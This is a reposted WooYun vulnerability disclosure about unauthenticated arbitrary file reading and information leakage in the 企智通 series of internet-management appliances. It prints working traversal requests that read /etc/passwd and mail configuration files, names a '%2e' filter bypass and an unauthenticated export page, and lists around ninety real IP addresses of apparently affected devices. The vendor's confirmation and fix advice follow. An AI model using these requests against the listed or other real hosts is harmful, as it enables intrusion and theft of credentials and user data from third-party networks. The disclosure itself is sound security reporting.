发新话题
打印

企智通系列上网行为管理设备存在两处任意文件遍历&敏感信息泄漏(无需登录)

企智通系列上网行为管理设备存在两处任意文件遍历&敏感信息泄漏(无需登录)

漏洞概要
缺陷编号:        WooYun-2015-145925
漏洞标题:        企智通系列上网行为管理设备存在两处任意文件遍历&敏感信息泄漏(都无需登录)
相关厂商:        北京宽广智通信息技术有限公司
漏洞作者:        YY-2012
提交时间:        2015-10-11 14:20
公开时间:        2016-01-12 10:58
漏洞类型:        任意文件遍历/下载
危害等级:        高
自评Rank:        20
漏洞状态: 厂商已经确认
漏洞来源:        http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:任意文件读取利用 敏感信息泄露 文件操作不当

漏洞详情披露状态:
2015-10-11:        细节已通知厂商并且等待厂商处理中
2015-10-14:        厂商已经确认,细节仅向厂商公开
2015-10-17:        细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-08:        细节向核心白帽子及相关领域专家公开
2015-12-18:        细节向普通白帽子公开
2015-12-28:        细节向实习白帽子公开
2016-01-12:        细节向公众公开

简要描述:部分设备已经修复过,但只是过滤字符而已。。
详细说明:http://gd.189.cn/biz/introd/infor/xxaq/2011/10/18/10083.htm

貌似通杀全型号设备:

企智通MINI型 企智通I型 企智通II型 企智通III型 企智通IV型 企智通V型 企智通IX型



(部分设备可通过“%2e”替换“.”即可绕过过滤)第一处任意文件遍历(也可目录遍历):


code 区域http://url/test/downTcpdumpFile.jsp?filename=../conf/email.cfg



(部分设备可通过“%2e”替换“.”即可绕过过滤)第二处任意文件遍历(也可目录遍历):


code 区域http://url/report/rp_download.jsp?file=/etc/passwd&null=null



敏感信息泄漏(太多了,举例一处,希望举一反三)


code 区域http://url/BEAP/user_eqp_batexport.jsp

漏洞证明:部分存在

















部分设备可通过“%2e”替换“.”即可绕过过滤









可目录遍历:









案例(与wooyun-2015-0139442同样的案例):


code 区域http://202.105.31.122:8888/customer.jsp
https://58.60.63.161/customer.jsp
http://116.6.87.76:8888/customer.jsp
http://219.129.23.92:8888/customer.jsp
https://14.18.144.27/customer.jsp
http://183.63.91.226:8888/customer.jsp
http://58.248.137.84:8888/customer.jsp
http://183.63.226.56:8888/customer.jsp
http://183.63.226.56:8888/customer.jsp
https://61.145.196.85/customer.jsp
http://119.146.1.2:8888/customer.jsp
https://183.62.21.51/customer.jsp
http://119.130.114.44:8888/customer.jsp
http://119.130.114.74:8888/customer.jsp
http://125.88.35.170:8888/customer.jsp
http://121.10.222.82:8888/customer.jsp
http://202.105.31.123:8888/customer.jsp
https://183.62.27.21/customer.jsp
https://59.41.254.150/customer.jsp
https://202.105.31.125/customer.jsp
http://219.129.31.170/customer.jsp
http://202.105.31.124:8888/customer.jsp
https://202.105.237.210/customer.jsp
https://183.62.21.50/customer.jsp
http://119.130.114.51:8888/customer.jsp
https://183.62.30.3/customer.jsp
http://202.105.31.126:8888/customer.jsp
http://121.13.250.199:8080/customer.jsp
https://183.62.27.22/customer.jsp
http://59.41.70.194:8888/customer.jsp
http://120.236.48.72/customer.jsp
https://183.63.166.179/customer.jsp
http://183.63.226.62:8888/customer.jsp
http://125.89.68.186/customer.jsp
https://61.145.196.89/customer.jsp
http://119.146.1.2/customer.jsp
http://121.8.187.250:8888/customer.jsp
http://58.252.169.206/customer.jsp
https://113.106.152.98/customer.jsp
http://119.145.67.138:8888/customer.jsp
http://183.63.137.154:8888/customer.jsp
https://61.144.72.202/customer.jsp
http://59.38.32.174:8888/customer.jsp
http://183.63.163.202:8888/customer.jsp
http://183.63.164.34:8888/customer.jsp
http://61.144.72.26:8888/customer.jsp
https://14.23.152.82/customer.jsp
http://125.88.35.187:8888/customer.jsp
https://183.62.27.19/customer.jsp
http://119.130.114.68:8888/customer.jsp
http://113.106.170.74:8888/customer.jsp
https://59.34.231.66/customer.jsp
https://183.62.30.6/customer.jsp
http://183.237.7.233:8888/customer.jsp
http://121.33.227.106:8888/customer.jsp
https://125.90.4.154/customer.jsp
http://113.108.143.186:8888/customer.jsp
http://183.63.91.228:8888/customer.jsp
http://219.132.63.186:8888/customer.jsp
http://119.145.16.200:8888/customer.jsp
http://218.14.208.104:8888/customer.jsp
http://183.63.226.53:8888/customer.jsp
http://183.63.165.50:8888/customer.jsp
https://202.105.237.234/customer.jsp
https://202.105.237.198/customer.jsp
https://202.105.237.194/customer.jsp
https://202.105.31.122/customer.jsp
https://183.62.21.52/customer.jsp
https://183.62.27.18/customer.jsp
https://183.62.27.20/customer.jsp
https://219.129.63.146/customer.jsp
https://113.106.104.242/customer.jsp
http://183.63.137.157:8888/customer.jsp
http://113.105.0.68:8888/customer.jsp
http://113.105.0.66:8888/customer.jsp
https://202.105.31.124/customer.jsp
http://202.105.31.125:8888/customer.jsp
https://183.62.30.2/customer.jsp
https://125.89.236.50/customer.jsp
https://219.132.61.10/customer.jsp
https://112.91.177.210/customer.jsp
https://125.90.0.210/customer.jsp
http://121.33.227.107:8888/customer.jsp
http://1.202.96.16:8888/customer.jsp
https://61.131.61.34/customer.jsp
https://59.61.238.158/customer.jsp
http://183.63.129.106:8888/customer.jsp
https://113.98.123.146/customer.jsp

修复方案:1.添加权限验证

2.推送补丁不要只推送列出的案例(用户居多应一一推送)


版权声明:转载请注明来源 YY-2012@乌云

漏洞回应
厂商回应:
危害等级:中

漏洞Rank:8
确认时间:2015-10-14 10:57
厂商回复:很抱歉刚看到漏洞报告,经测试确认问题存在,正在组织修订和升级方案。
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2015-0145925

TOP

发新话题